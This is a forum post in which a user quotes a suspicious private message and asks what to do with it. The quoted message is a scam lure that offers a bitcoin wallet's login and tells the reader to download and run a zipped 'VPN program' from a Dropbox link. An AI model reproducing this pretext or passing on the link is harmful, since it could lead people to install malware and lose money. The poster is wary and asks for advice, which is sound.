I just recieved this message(quoted below). I tried logging in the blockchain.info site but as said in the message it blocked my login as i was not logging in from IP). But too much scared to download any program.
So what should i do with this thing.
Delete --> Forget for ever??
Here is virustotal snap though

!!! WARNING: This user is a newbie. If you are expecting a message from a more veteran member, then this is an imposter !!!
Ok. That's the info of my blockchain wallet. Take it. It contains $ 2,728 (6 BTC).
Please when you receive my money contact me so I give you the info of Western Union so you can send to me.
wallet address:
https://blockchain.info/address/19J3RTxhppsCttkTgAi6pABCmqvcu5bNBawallet id:
Before you enter the id and the password you must be logged in from my ip so they don't block you. Use this VPN program on your computer to connect to my ip address (
https://www.dropbox.com/s/doi15vw25axk1i3/vpn.zip?dl=1). First you unzip the file. Then you open config.txt and it looks like the following:
ip-address= ""
port= "8085"
In ip-address you put "" , leave the port as it is.Now open the vpn program and you will be connected to my ip. just try opening blockchain website and enter my wallet id and my password and you should be logged in. If it asks you about confirmation code to email, contact me and I will send you the code.